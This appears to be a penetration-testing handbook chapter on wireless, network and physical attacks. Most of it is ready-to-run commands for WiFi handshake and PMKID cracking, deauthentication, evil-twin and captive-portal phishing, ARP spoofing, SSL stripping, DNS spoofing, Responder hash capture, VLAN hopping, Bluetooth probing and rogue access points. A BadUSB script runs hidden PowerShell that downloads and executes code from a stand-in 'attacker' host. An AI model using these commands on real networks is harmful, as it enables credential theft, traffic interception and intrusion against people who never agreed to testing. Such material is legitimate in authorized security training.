Wireless & Network Attacks
WiFi exploitation, network-layer attacks, physical access vectors
Physical Proximity Required
Most attacks in this chapter require physical proximity to the target network. Wireless attacks need you within radio range. Network attacks often require being on the same LAN segment. Always have written authorization that explicitly covers wireless and network testing.
WiFi Attack Fundamentals
Wireless Adapter Setup
Effective WiFi attacks require an adapter that supports monitor mode and packet injection. Not all adapters support these features.
# Check if adapter supports monitor mode
iw list | grep -A 10 "Supported interface modes"
# Recommended chipsets:
# - Atheros AR9271 (ALFA AWUS036NHA)
# - Realtek RTL8812AU (ALFA AWUS036ACH)
# - Ralink RT3070 (various)
# Enable monitor mode
sudo airmon-ng check kill # Kill interfering processes
sudo airmon-ng start wlan0 # Creates wlan0mon
# Verify monitor mode
iwconfig wlan0mon
# Should show: Mode:MonitorWireless Reconnaissance
# Scan for networks with airodump-ng
sudo airodump-ng wlan0mon
# Output columns explained:
# BSSID - Access point MAC address
# PWR - Signal strength (higher = closer)
# Beacons - Number of beacon frames
# #Data - Number of data packets
# CH - Channel
# MB - Maximum speed
# ENC - Encryption (WPA2, WEP, OPN)
# CIPHER - Cipher (CCMP, TKIP)
# AUTH - Authentication (PSK, MGT)
# ESSID - Network name
# Focus on specific channel/network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Lower section shows connected clients:
# STATION - Client MAC address
# PWR - Client signal strength
# Rate - Connection speed
# Packets - Number of packetsWPA2/WPA3 Attacks
WPA2-PSK Handshake Capture
WPA2-PSK security relies on a 4-way handshake. Capturing this handshake allows offline password cracking without further network interaction.
# Start capture on target network
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Wait for client to connect, OR force reconnection with deauth
# In separate terminal:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# │ │ │ │
# │ │ │ └── Target client MAC
# │ │ └── Access point BSSID
# │ └── Number of deauth packets
# └── Deauthentication attack
# airodump-ng will show "WPA handshake: AA:BB:CC:DD:EE:FF" when captured
# Verify handshake
aircrack-ng handshake-01.cap
# Should show: "1 handshake"Offline Password Cracking
# Convert capture to hashcat format
cap2hccapx handshake-01.cap handshake.hccapx
# Or for newer format
hcxpcapngtool -o handshake.22000 handshake-01.cap
# Crack with hashcat
hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 22000 handshake.22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Crack with aircrack-ng (slower but simpler)
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap
# Common WiFi password patterns to try:
# - Company name + year (Acme2024)
# - Street address (123MainSt)
# - Phone numbers (5551234567)
# - Simple patterns (Password1, Welcome1)PMKID Attack (Clientless)
PMKID attack captures authentication material from the AP itself—no client deauth required:
# Using hcxdumptool
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
# Wait until PMKID is captured (usually within minutes)
# Look for: [FOUND PMKID]
# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng
# Crack with hashcat
hashcat -m 22000 pmkid.22000 wordlist.txtWhy PMKID Works
The PMKID is calculated as: HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_Client). Since we know all inputs except PMK (derived from password), we can brute force offline. This attack works against WPA2-Personal and some WPA3-Personal (Transition Mode).
WPA3 Considerations
# WPA3-Personal uses SAE (Simultaneous Authentication of Equals)
# - Resistant to offline dictionary attacks
# - No handshake to capture
# However:
# 1. Transition mode (WPA2/WPA3 mixed) still allows WPA2 attacks
# 2. Downgrade attacks may force WPA2 connection
# 3. Side-channel attacks (Dragonblood) exist but are complex
# Check if network is WPA3-only or Transition:
sudo airodump-ng wlan0mon
# Look for "WPA3" or "SAE" in AUTH columnEvil Twin Attacks
Create a fake access point mimicking the target network. Clients connect to you instead, allowing credential capture and MITM attacks.
Basic Evil Twin Setup
# Using hostapd-wpe for WPA2-Enterprise attack
# Install: apt install hostapd-wpe
# Create configuration file
cat > /etc/hostapd-wpe/hostapd-wpe.conf << EOF
interface=wlan0
driver=nl80211
ssid=CorpNetwork # Target network name
channel=6
hw_mode=g
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
dh_file=/etc/hostapd-wpe/certs/dh
EOF
# Start evil twin
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# When clients connect with credentials:
# username: jsmith
# challenge: aa:bb:cc:dd:ee:ff:00:11
# response: 11:22:33:44:55:66:77:88
# Crack captured hash
asleap -C aa:bb:cc:dd:ee:ff:00:11 -R 11:22:33:44:55:66:77:88 -W wordlist.txtCaptive Portal Attack
# Using Wifiphisher for automated evil twin with captive portal
sudo wifiphisher -aI wlan0 -jI wlan1 -p oauth-login
# Options:
# -aI - Interface for AP
# -jI - Interface for jamming (deauth)
# -p - Phishing scenario
# --essid - Target network name
# Scenarios include:
# - oauth-login - Fake Google/social login
# - wifi-connect - "Enter password to connect"
# - firmware-upgrade - "Router firmware update"
# - plugin_update - "Browser plugin required"
# Credentials captured are logged to fileNetwork Layer Attacks
ARP Spoofing/Poisoning
ARP has no authentication. By sending fake ARP responses, you can associate your MAC with the gateway IP, causing all traffic to flow through you.
# Enable IP forwarding (so traffic continues to destination)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Using arpspoof (dsniff package)
# Terminal 1: Poison target, claim to be gateway
sudo arpspoof -i eth0 -t 192.168.1.100 -r 192.168.1.1
# │ │
# │ └── Gateway IP
# └── Target IP
# Now all traffic from 192.168.1.100 flows through us
# Using bettercap (more powerful)
sudo bettercap -iface eth0
# In bettercap console:
net.probe on # Discover hosts
set arp.spoof.targets 192.168.1.100
arp.spoof on
net.sniff on # Capture trafficMan-in-the-Middle with SSL Strip
# Using bettercap for HTTPS downgrade
sudo bettercap -iface eth0
# Enable modules
set arp.spoof.targets 192.168.1.100
set http.proxy.sslstrip true
set net.sniff.local true
arp.spoof on
http.proxy on
net.sniff on
# bettercap will:
# 1. Intercept HTTPS connections
# 2. Strip HTTPS, serve HTTP to victim
# 3. Forward to real site over HTTPS
# 4. Capture credentials in plaintext
# Works against sites without HSTS preloadDNS Spoofing
# Using bettercap
set dns.spoof.domains *.google.com, *.facebook.com
set dns.spoof.address 192.168.1.50 # Your malicious server
dns.spoof on
# Or using Ettercap
# Create /etc/ettercap/etter.dns:
*.google.com A 192.168.1.50
*.facebook.com A 192.168.1.50
# Run ettercap
sudo ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//LLMNR/NBT-NS Poisoning
Windows systems broadcast name resolution requests. By responding to these, you capture NTLMv2 hashes without any network modification. This is often a precursor to lateral movement—use captured hashes for Pass-the-Hash attacks or crack them for plaintext credentials (see Credential Access).
# Using Responder
sudo responder -I eth0 -wrf
# Options:
# -w Enable WPAD rogue proxy
# -r Enable NBT-NS responses
# -f Fingerprint hosts
# When Windows machine tries to resolve a name:
# 1. DNS fails (name doesn't exist)
# 2. System broadcasts LLMNR/NBT-NS query
# 3. Responder answers "I'm that host!"
# 4. Victim connects, sends NTLMv2 hash
# Hashes saved to /usr/share/responder/logs/
# Format: username::domain:challenge:response:...
# Crack with hashcat
hashcat -m 5600 hashes.txt wordlist.txtDetection Opportunity
LLMNR/NBT-NS poisoning is extremely common in internal pentests. Defenders should: disable LLMNR (Group Policy), disable NBT-NS (network adapter settings), and monitor for Responder-like traffic patterns.
VLAN Attacks
VLAN Hopping
# DTP (Dynamic Trunking Protocol) attack
# If switch port is set to "dynamic" (Cisco default), you can become a trunk
# Using Yersinia
sudo yersinia -G # GUI mode
# Select DTP tab → "Enable trunking"
# Or command line:
sudo yersinia dtp -attack 1 -interface eth0
# Once trunk is established, tag packets for other VLANs
# Using Linux vconfig:
sudo vconfig add eth0 100 # Add VLAN 100
sudo ifconfig eth0.100 up
sudo dhclient eth0.100 # Get IP on VLAN 100Double Tagging Attack
# Works when: attacker VLAN = switch native VLAN
# Outer tag is stripped by first switch, inner tag routes to target VLAN
# Using Scapy
from scapy.all import *
# Create double-tagged frame
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="192.168.100.1")/ICMP()
sendp(packet, iface="eth0")
# Limitations:
# - One-way only (replies go to real destination)
# - Requires being on native VLAN
# - Modern switches often mitigate thisBluetooth Attacks
Bluetooth Reconnaissance
# Scan for discoverable devices
hcitool scan
# Returns: MAC address and device name
# Scan for all devices (including non-discoverable)
# Requires btscanner or specialized tools
sudo btscanner
# Get device info
hcitool info AA:BB:CC:DD:EE:FF
# List services
sdptool browse AA:BB:CC:DD:EE:FFBlueBorne Vulnerability Check
# BlueBorne (2017) affected billions of devices
# Check if target is vulnerable:
python blueborne-scanner.py -t AA:BB:CC:DD:EE:FF
# Affected: Android, iOS, Windows, Linux (before patches)
# Allows: RCE without pairingBluetooth Low Energy (BLE)
# Scan for BLE devices
sudo hcitool lescan
# Using bettercap for BLE
sudo bettercap
ble.recon on
# Enumerate characteristics
sudo gatttool -b AA:BB:CC:DD:EE:FF --characteristics
# Read characteristic value
sudo gatttool -b AA:BB:CC:DD:EE:FF --char-read -a 0x000c
# BLE devices often have:
# - No authentication
# - Sensitive data in characteristics
# - Writable handles that change device behaviorPhysical Security Bypass
USB Attack Vectors
# Rubber Ducky / BadUSB
# Appears as keyboard, types malicious commands
# Example Ducky Script for reverse shell:
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker/ps.ps1')"
ENTER
# USB Ethernet adapter (LAN Turtle, Bash Bunny)
# Becomes network gateway, captures traffic
# Can inject packets, perform MITM
# USB implant detection is difficult
# Defenses: USB port blockers, endpoint DLPNetwork Implants
# Packet Squirrel / LAN Turtle
# Small device inserted between computer and network
# Capabilities:
# - Passive traffic capture
# - Active MITM
# - Reverse shell home
# - DNS spoofing
# Detection:
# - Network port mapping
# - MAC address monitoring
# - Physical inspection
# Raspberry Pi Zero as implant
# - POE powered
# - WiFi for exfiltration
# - Full Linux OS for flexibilityRogue Access Points
# Deploy rogue AP on internal network
# Bypasses wired network security
# Using hostapd
cat > /etc/hostapd/hostapd.conf << EOF
interface=wlan0
driver=nl80211
ssid=Guest-WiFi
hw_mode=g
channel=7
wpa=2
wpa_passphrase=SimplePassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
# Set up NAT
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
# Start AP
sudo hostapd /etc/hostapd/hostapd.conf
# Now capture all traffic from connected clients